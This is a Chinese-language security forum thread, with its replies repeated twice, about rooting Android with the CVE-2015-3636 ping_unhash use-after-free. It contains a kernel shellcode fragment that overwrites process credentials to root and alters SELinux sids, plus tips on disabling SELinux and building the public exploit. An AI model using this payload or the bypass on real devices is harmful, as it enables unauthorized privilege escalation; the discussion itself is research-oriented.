[求助]手机root提权问题求助-Android安全-看雪-安全社区|安全招聘|kanxue.com

最新回复 (17)
GeneBlue 雪币： 47 活跃值： (418) 能力值： ( LV7，RANK：100 ) 在线值：发帖 3 回帖 93 粉丝 6 关注私信	GeneBlue 2 2 楼用的是哪个漏洞 2016-2-19 09:57 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 3 楼 20153636 2016-2-19 10:41 0
frozenrain 雪币： 107 活跃值： (1683) 能力值： ( LV6，RANK：80 ) 在线值：发帖 26 回帖 509 粉丝 1 关注私信	frozenrain 4 楼 /system/bin/sh 所有用户都会有执行权限. 2016-2-19 14:46 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 5 楼是啊，在漏洞触发之前调用都没有问题。漏洞触发后，使用execl运行/system/bin/sh，就会返回值-1，此时errno=13 2016-2-19 15:59 0
GeneBlue 雪币： 47 活跃值： (418) 能力值： ( LV7，RANK：100 ) 在线值：发帖 3 回帖 93 粉丝 6 关注私信	GeneBlue 2 6 楼楼主，可否一起探讨这个漏洞^=^,geneblue.mail@gmail.com 2016-3-1 14:23 0
xxyyuu 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	xxyyuu 7 楼这是因为的你shellcode 写的有问题。。不光是要修改GID UID等值，，有一个结构体security; 的指针也必须要设置。。否则将出现无权限的情况，，我把代码贴给你。。直接改下就OK struct task_security_struct security; if (cred != NULL) { cred->uid = 0; cred->gid = 0; cred->suid = 0; cred->sgid = 0; cred->euid = 0; cred->egid = 0; cred->fsuid = 0; cred->fsgid = 0; cred->cap_inheritable.cap[0] = 0xffffffff; cred->cap_inheritable.cap[1] = 0xffffffff; cred->cap_permitted.cap[0] = 0xffffffff; cred->cap_permitted.cap[1] = 0xffffffff; cred->cap_effective.cap[0] = 0xffffffff; cred->cap_effective.cap[1] = 0xffffffff; cred->cap_bset.cap[0] = 0xffffffff; cred->cap_bset.cap[1] = 0xffffffff; security = cred->security; if (security) { if (security->osid != 0 && security->sid != 0 && security->exec_sid == 0 && security->create_sid == 0 && security->keycreate_sid == 0 && security->sockcreate_sid == 0) { security->osid = 1; security->sid = 1; g_test = 10; } } 2016-3-1 15:29 0
xxyyuu 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	xxyyuu 8 楼还有。一点要注意。。就是你调用/system/bin/sh 的时候。。。你自己进程的父进程ID 必须为1（init进程） 2016-3-1 15:30 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 9 楼非常非常感谢，我先试试 2016-3-2 14:07 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 10 楼按照这种方法,4.3可以了。可是我把系统升级到5.0后，又开始报同样的错误啦 2016-3-4 07:25 0
Nermor 雪币： 138 活跃值： (460) 能力值： ( LV4，RANK：50 ) 在线值：发帖 29 回帖 371 粉丝 2 关注私信	Nermor 1 11 楼 5.0 以后可能是SELinux 导致的可以尝试在install-recovery.sh 中启动daemon ，并为sepolicy打补丁；详细做法可以参考 chainfire 的supersu 2016-3-4 09:03 0
xxyyuu 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	xxyyuu 12 楼 5.0SELINUX 的问题。。。如果你先有权限的情况下，，可以直接关闭掉SElinux 2016-3-4 14:59 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 13 楼我是了setenforce 0，返回失败；是要用其它搜索内存地址的方法关闭吗？ 2016-3-4 15:15 0
haolipeng 雪币： 42 活跃值： (35) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	haolipeng 14 楼请教下大神,你的20153636漏洞是如何应用的,我下载github上代码后只有.c 问Android.mk文件,由于对安卓开发真心不熟悉,请教下如何使用这个代码?我qq:1078285863 先感谢大哥了 2016-3-9 10:56 0
xxyyuu 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	xxyyuu 15 楼 2015-3636 ping_unhash漏洞一个典型的UAF漏洞。。。指针引用释放的问题。。。 git的代码直接用 android ndk 编译。。。那份代码在一部分机器上是可以跑成功的。。。只是成功率不太高 2016-3-11 10:20 0
xxyyuu 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	xxyyuu 16 楼你是自己研究的还是在公司上班？有兴趣搞漏洞挖掘和分析的话，，可以来我公司。。。 2016-3-11 11:46 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 17 楼我目前自由职业，主要做手机数据恢复。对漏洞挖掘、分析感兴趣，就是这方面的基础不扎实 2016-3-16 12:33 0
影子不寂寞雪币： 6 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 349 粉丝 1 关注私信	影子不寂寞 18 楼学习一下 2016-3-16 12:53 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (17)
GeneBlue 雪币： 47 活跃值： (418) 能力值： ( LV7，RANK：100 ) 在线值：发帖 3 回帖 93 粉丝 6 关注私信	GeneBlue 2 2 楼用的是哪个漏洞 2016-2-19 09:57 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 3 楼 20153636 2016-2-19 10:41 0
frozenrain 雪币： 107 活跃值： (1683) 能力值： ( LV6，RANK：80 ) 在线值：发帖 26 回帖 509 粉丝 1 关注私信	frozenrain 4 楼 /system/bin/sh 所有用户都会有执行权限. 2016-2-19 14:46 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 5 楼是啊，在漏洞触发之前调用都没有问题。漏洞触发后，使用execl运行/system/bin/sh，就会返回值-1，此时errno=13 2016-2-19 15:59 0
GeneBlue 雪币： 47 活跃值： (418) 能力值： ( LV7，RANK：100 ) 在线值：发帖 3 回帖 93 粉丝 6 关注私信	GeneBlue 2 6 楼楼主，可否一起探讨这个漏洞^=^,geneblue.mail@gmail.com 2016-3-1 14:23 0
xxyyuu 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	xxyyuu 7 楼这是因为的你shellcode 写的有问题。。不光是要修改GID UID等值，，有一个结构体security; 的指针也必须要设置。。否则将出现无权限的情况，，我把代码贴给你。。直接改下就OK struct task_security_struct security; if (cred != NULL) { cred->uid = 0; cred->gid = 0; cred->suid = 0; cred->sgid = 0; cred->euid = 0; cred->egid = 0; cred->fsuid = 0; cred->fsgid = 0; cred->cap_inheritable.cap[0] = 0xffffffff; cred->cap_inheritable.cap[1] = 0xffffffff; cred->cap_permitted.cap[0] = 0xffffffff; cred->cap_permitted.cap[1] = 0xffffffff; cred->cap_effective.cap[0] = 0xffffffff; cred->cap_effective.cap[1] = 0xffffffff; cred->cap_bset.cap[0] = 0xffffffff; cred->cap_bset.cap[1] = 0xffffffff; security = cred->security; if (security) { if (security->osid != 0 && security->sid != 0 && security->exec_sid == 0 && security->create_sid == 0 && security->keycreate_sid == 0 && security->sockcreate_sid == 0) { security->osid = 1; security->sid = 1; g_test = 10; } } 2016-3-1 15:29 0
xxyyuu 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	xxyyuu 8 楼还有。一点要注意。。就是你调用/system/bin/sh 的时候。。。你自己进程的父进程ID 必须为1（init进程） 2016-3-1 15:30 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 9 楼非常非常感谢，我先试试 2016-3-2 14:07 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 10 楼按照这种方法,4.3可以了。可是我把系统升级到5.0后，又开始报同样的错误啦 2016-3-4 07:25 0
Nermor 雪币： 138 活跃值： (460) 能力值： ( LV4，RANK：50 ) 在线值：发帖 29 回帖 371 粉丝 2 关注私信	Nermor 1 11 楼 5.0 以后可能是SELinux 导致的可以尝试在install-recovery.sh 中启动daemon ，并为sepolicy打补丁；详细做法可以参考 chainfire 的supersu 2016-3-4 09:03 0
xxyyuu 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	xxyyuu 12 楼 5.0SELINUX 的问题。。。如果你先有权限的情况下，，可以直接关闭掉SElinux 2016-3-4 14:59 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 13 楼我是了setenforce 0，返回失败；是要用其它搜索内存地址的方法关闭吗？ 2016-3-4 15:15 0
haolipeng 雪币： 42 活跃值： (35) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	haolipeng 14 楼请教下大神,你的20153636漏洞是如何应用的,我下载github上代码后只有.c 问Android.mk文件,由于对安卓开发真心不熟悉,请教下如何使用这个代码?我qq:1078285863 先感谢大哥了 2016-3-9 10:56 0
xxyyuu 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	xxyyuu 15 楼 2015-3636 ping_unhash漏洞一个典型的UAF漏洞。。。指针引用释放的问题。。。 git的代码直接用 android ndk 编译。。。那份代码在一部分机器上是可以跑成功的。。。只是成功率不太高 2016-3-11 10:20 0
xxyyuu 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	xxyyuu 16 楼你是自己研究的还是在公司上班？有兴趣搞漏洞挖掘和分析的话，，可以来我公司。。。 2016-3-11 11:46 0
harborian 雪币： 26 活跃值： (45) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 84 粉丝 0 关注私信	harborian 17 楼我目前自由职业，主要做手机数据恢复。对漏洞挖掘、分析感兴趣，就是这方面的基础不扎实 2016-3-16 12:33 0
影子不寂寞雪币： 6 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 349 粉丝 1 关注私信	影子不寂寞 18 楼学习一下 2016-3-16 12:53 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复